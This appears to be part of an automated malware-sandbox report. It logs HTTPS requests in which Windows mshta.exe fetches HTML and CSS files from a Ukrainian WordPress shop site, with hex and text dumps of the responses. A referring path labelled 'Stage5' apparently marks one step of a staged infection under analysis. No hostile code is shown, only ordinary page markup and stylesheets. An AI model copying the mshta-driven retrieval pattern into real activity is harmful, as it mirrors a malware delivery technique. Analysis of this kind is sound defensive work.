                                                                                                                                                                                                      2024-10-27 06:35:07 UTC16030INData Raw: 66 65 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 75 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 75 72 74 2e 64 75 6e 61 2e 75 61 2f 78 6d 6c 72 70 63 2e 70 68 70 22 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 68 74 6d 6c 29 7b 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 20
                                                                                                                                                                                                      Data Ascii: fec7<!DOCTYPE html><html lang="uk" class="loading-site no-js"><head><meta charset="UTF-8"/><link rel="profile" href="http://gmpg.org/xfn/11"/><link rel="pingback" href="https://gurt.duna.ua/xmlrpc.php"/><script>(function(html){html.className
                                                                                                                                                                                                      2024-10-27 06:35:07 UTC16384INData Raw: 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 62 75 74 74 6f 6e 27 5d 2e 70 72 69 6d 61 72 79 2c 20 2e 62 61 64 67 65 2d 69 6e 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 36 61 33 30 61 3b 7d 2f 2a 20 42 6f 72 64 65 72 20 2a 2f 2e 6e 61 76 2d 76 65 72 74 69 63 61 6c 2e 6e 61 76 2d 74 61 62 73 20 3e 20 6c 69 2e 61 63 74 69 76 65 20 3e 20 61 2c 2e 73 63 72 6f 6c 6c 2d 74 6f 2d 62 75 6c 6c 65 74 73 20 61 2e 61 63 74 69 76 65 2c 2e 6e 61 76 2d 70 61 67 69 6e 61 74 69 6f 6e 20 3e 20 6c 69 20 3e 20 2e 63 75 72 72 65 6e 74 2c 2e 6e 61 76 2d 70 61 67 69 6e 61 74 69 6f 6e 20 3e 20 6c 69 20 3e 20 73 70 61 6e 3a 68 6f 76 65 72 2c 2e 6e 61 76 2d 70 61 67 69 6e 61 74 69 6f 6e 20 3e 20 6c 69 20 3e 20 61 3a 68 6f 76 65 72 2c 2e 68 61 73 2d 68 6f 76
                                                                                                                                                                                                      Data Ascii: input[type='button'].primary, .badge-inner{background-color: #f6a30a;}/* Border */.nav-vertical.nav-tabs > li.active > a,.scroll-to-bullets a.active,.nav-pagination > li > .current,.nav-pagination > li > span:hover,.nav-pagination > li > a:hover,.has-hov
                                                                                                                                                                                                      2024-10-27 06:35:07 UTC16384INData Raw: 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 22 2f 3e 3c 66 65 43 6f 6d 70 6f 6e 65 6e 74 54 72 61 6e 73 66 65 72 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 3e 3c 66 65 46 75 6e 63 52 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 20 31 22 2f 3e 3c 66 65 46 75 6e 63 47 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 20 30 2e 32 37 38 34 33 31 33 37 32 35 34 39 30 32 22 2f 3e 3c 66 65 46 75 6e 63 42 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 2e 35 39 32 31 35 36 38 36 32 37 34 35 31 20 30 2e 32 37 38 34 33 31 33 37 32 35 34 39 30
                                                                                                                                                                                                      Data Ascii: .587 .114 0 0 .299 .587 .114 0 0 "/><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0 1"/><feFuncG type="table" tableValues="0 0.27843137254902"/><feFuncB type="table" tableValues="0.5921568627451 0.2784313725490
                                                                                                                                                                                                      2024-10-27 06:35:07 UTC16384INData Raw: 69 74 65 6d 20 6c 61 6e 67 2d 69 74 65 6d 2d 35 36 35 20 6c 61 6e 67 2d 69 74 65 6d 2d 75 6b 20 63 75 72 72 65 6e 74 2d 6c 61 6e 67 20 6e 6f 2d 74 72 61 6e 73 6c 61 74 69 6f 6e 20 6c 61 6e 67 2d 69 74 65 6d 2d 66 69 72 73 74 22 3e 3c 61 20 6c 61 6e 67 3d 22 75 6b 22 20 68 72 65 66 6c 61 6e 67 3d 22 75 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 75 72 74 2e 64 75 6e 61 2e 75 61 2f 22 3e 55 41 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 61 6e 67 2d 69 74 65 6d 20 6c 61 6e 67 2d 69 74 65 6d 2d 35 36 38 20 6c 61 6e 67 2d 69 74 65 6d 2d 72 75 20 6e 6f 2d 74 72 61 6e 73 6c 61 74 69 6f 6e 22 3e 3c 61 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 20 68 72 65 66 6c 61 6e 67 3d 22 72 75 2d 52 55 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                                                                                                                                                                      Data Ascii: item lang-item-565 lang-item-uk current-lang no-translation lang-item-first"><a lang="uk" hreflang="uk" href="https://gurt.duna.ua/">UA</a></li><li class="lang-item lang-item-568 lang-item-ru no-translation"><a lang="ru-RU" hreflang="ru-RU" href="https:
                                                                                                                                                                                                      2024-10-27 06:35:08 UTC16384INData Raw: 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36 29 20 34 30 25 2c 72 67 0d 0a 36 66 31 39 0d 0a 62 28 32 33 38 2c 34 34 2c 31 33 30 29 20 36 30 25 2c 72 67 62 28 32 35 31 2c 31 30 35 2c 39 38 29 20 38 30 25 2c 72 67 62 28 32 35 34 2c 32 34 38 2c 37 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d
                                                                                                                                                                                                      Data Ascii: 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rg6f19b(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-
                                                                                                                                                                                                      2024-10-27 06:35:08 UTC12119INData Raw: 20 3d 20 22 d0 bf d0 be d0 ba d0 b0 d0 b7 d0 b0 d1 82 d0 b8 20 d1 84 d1 96 d0 bb d1 8c d1 82 d1 80 20 d0 bf d1 80 d0 be d0 b4 d1 83 d0 ba d1 82 d1 96 d0 b2 22 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 77 6f 6f 66 5f 6c 61 6e 67 5f 68 69 64 65 5f 70 72 6f 64 75 63 74 73 5f 66 69 6c 74 65 72 20 3d 20 22 d0 bf d1 80 d0 b8 d1 85 d0 be d0 b2 d0 b0 d1 82 d0 b8 20 d1 84 d1 96 d0 bb d1 8c d1 82 d1 80 20 d0 bf d1 80 d0 be d0 b4 d1 83 d0 ba d1 82 d1 96 d0 b2 20 2d 22 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 77 6f 6f 66 5f 6c 61 6e 67 5f 70 72 69 63 65 72 61 6e 67 65 20 3d 20 22 d0 b4 d1 96 d0 b0 d0 bf d0 b0 d0 b7 d0 be d0 bd 20 d1 86 d1 96 d0 bd 22 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 77 6f 6f 66 5f 75 73 65 5f 62 65 61 75 74 79 5f 73 63 72 6f
                                                                                                                                                                                                      Data Ascii: = " "; var woof_lang_hide_products_filter = " -"; var woof_lang_pricerange = " "; var woof_use_beauty_scro


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      1192.168.2.549705185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:08 UTC429OUTGET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:08 UTC329INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:08 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 217
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:52:46 GMT
                                                                                                                                                                                                      ETag: "64e090ee-d9"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:08 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:08 UTC217INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 20 63 61 6c 63 28 31 2e 33 33 33 65 6d 20 2b 20 32 70 78 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 32 35 65 6d 7d
                                                                                                                                                                                                      Data Ascii: /*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      2192.168.2.549706185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:08 UTC452OUTGET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:09 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:09 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 2859
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Wed, 05 Jul 2023 10:44:56 GMT
                                                                                                                                                                                                      ETag: "64a549a8-b2b"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:09 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:09 UTC2859INData Raw: 2e 77 70 63 66 37 20 2e 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 72 65 73 70 6f 6e 73 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 63 6c 69 70 3a 20 72 65 63 74 28 31 70 78 2c 20 31 70 78 2c 20 31 70 78 2c 20 31 70 78 29 3b 0a 09 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 0a 09 68 65 69 67 68 74 3a 20 31 70 78 3b 0a 09 77 69 64 74 68 3a 20 31 70 78 3b 0a 09 6d 61 72 67 69 6e 3a 20 2d 31 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 6f 72 64 65 72 3a 20 30 3b 0a 09 77 6f 72 64 2d 77 72 61 70 3a 20 6e 6f 72 6d 61 6c 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 77 70 63 66 37 20 66 6f 72 6d 20 2e 77 70 63 66 37 2d 72 65 73 70 6f
                                                                                                                                                                                                      Data Ascii: .wpcf7 .screen-reader-response {position: absolute;overflow: hidden;clip: rect(1px, 1px, 1px, 1px);clip-path: inset(50%);height: 1px;width: 1px;margin: -1px;padding: 0;border: 0;word-wrap: normal !important;}.wpcf7 form .wpcf7-respo


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      3192.168.2.549707185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:09 UTC457OUTGET /wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:10 UTC333INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:09 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 27359
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-6adf"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:09 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:10 UTC16051INData Raw: 2e 77 6f 6f 66 5f 63 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 39 70 78 3b 0a 7d 0a 0a 2e 77 6f 6f 66 5f 63 6f 6e 74 61 69 6e 65 72 20 73 65 6c 65 63 74 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 7d 0a 0a 2e 77 6f 6f 66 5f 63 6f 6e 74 61 69 6e 65 72 20 6c 61 62 65 6c 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 75 6c 2e 77 6f 6f 66 5f 6c 69 73 74 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 6c 69 73 74 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 6c 69
                                                                                                                                                                                                      Data Ascii: .woof_container{ padding-bottom: 5px; margin-bottom: 9px;}.woof_container select{ width: 100%;}.woof_container label{ display: inline-block !important;}ul.woof_list{ margin: 0 !important; list-style: none !important;}li
                                                                                                                                                                                                      2024-10-27 06:35:10 UTC11308INData Raw: 69 6f 5f 63 68 65 63 6b 20 64 74 2e 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 72 61 64 69 6f 5f 63 68 65 63 6b 5f 6f 70 65 6e 65 64 20 61 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 61 30 62 63 63 33 38 35 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 66 66 66 3b 0a 7d 0a 0a 2e 77 6f 6f 66 5f 73 69 64 5f 66 6c 61 74 5f 67 72 65 79 20 2e 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 72 61 64 69 6f 5f 63 68 65 63 6b 20 64 74 20 61 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 73 6f 6c 69 64 20 32 70 78 20 23 61 61 61 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 70 78 3b 0a 7d 0a 2e 77 6f 6f 66 5f 73 69 64 5f
                                                                                                                                                                                                      Data Ascii: io_check dt.woof_select_radio_check_opened a { background-color: #a0bcc385; color: #fff !important; border: solid 1px #fff;}.woof_sid_flat_grey .woof_select_radio_check dt a { border: solid 2px #aaa; border-radius: 0px;}.woof_sid_


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      4192.168.2.549708185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:10 UTC468OUTGET /wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:10 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:10 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 9765
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-2625"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:10 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:10 UTC9765INData Raw: 2f 2a 21 0a 43 68 6f 73 65 6e 2c 20 61 20 53 65 6c 65 63 74 20 42 6f 78 20 45 6e 68 61 6e 63 65 72 20 66 6f 72 20 6a 51 75 65 72 79 20 61 6e 64 20 50 72 6f 74 6f 74 79 70 65 0a 62 79 20 50 61 74 72 69 63 6b 20 46 69 6c 6c 65 72 20 66 6f 72 20 48 61 72 76 65 73 74 2c 20 68 74 74 70 3a 2f 2f 67 65 74 68 61 72 76 65 73 74 2e 63 6f 6d 0a 0a 56 65 72 73 69 6f 6e 20 63 75 73 74 6f 6d 0a 46 75 6c 6c 20 73 6f 75 72 63 65 20 61 74 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 68 61 72 76 65 73 74 68 71 2f 63 68 6f 73 65 6e 0a 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 48 61 72 76 65 73 74 20 68 74 74 70 3a 2f 2f 67 65 74 68 61 72 76 65 73 74 2e 63 6f 6d 0a 0a 4d 49 54 20 4c 69 63 65 6e 73 65 2c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d
                                                                                                                                                                                                      Data Ascii: /*!Chosen, a Select Box Enhancer for jQuery and Prototypeby Patrick Filler for Harvest, http://getharvest.comVersion customFull source at https://github.com/harvesthq/chosenCopyright (c) Harvest http://getharvest.comMIT License, https://github.com


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      5192.168.2.549709185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:11 UTC475OUTGET /wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:11 UTC329INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:11 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 163
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-a3"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:11 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:11 UTC163INData Raw: 2e 77 6f 6f 66 5f 61 75 74 68 6f 72 73 20 6c 69 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 37 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 75 6c 2e 77 6f 6f 66 5f 61 75 74 68 6f 72 73 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a
                                                                                                                                                                                                      Data Ascii: .woof_authors li{ margin-top:7px !important; list-style-type: none !important;}ul.woof_authors{ margin: 0 !important; padding: 0 !important;}


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      6192.168.2.549710185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:11 UTC477OUTGET /wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:11 UTC328INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:11 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 61
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-3d"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:11 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:11 UTC61INData Raw: 2e 77 6f 6f 66 5f 63 68 65 63 6b 62 6f 78 5f 69 6e 73 74 6f 63 6b 5f 63 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 34 70 78 3b 0a 7d 0a 0a
                                                                                                                                                                                                      Data Ascii: .woof_checkbox_instock_container{ margin-bottom: 4px;}


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      7192.168.2.549711185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:12 UTC476OUTGET /wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/css/front.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
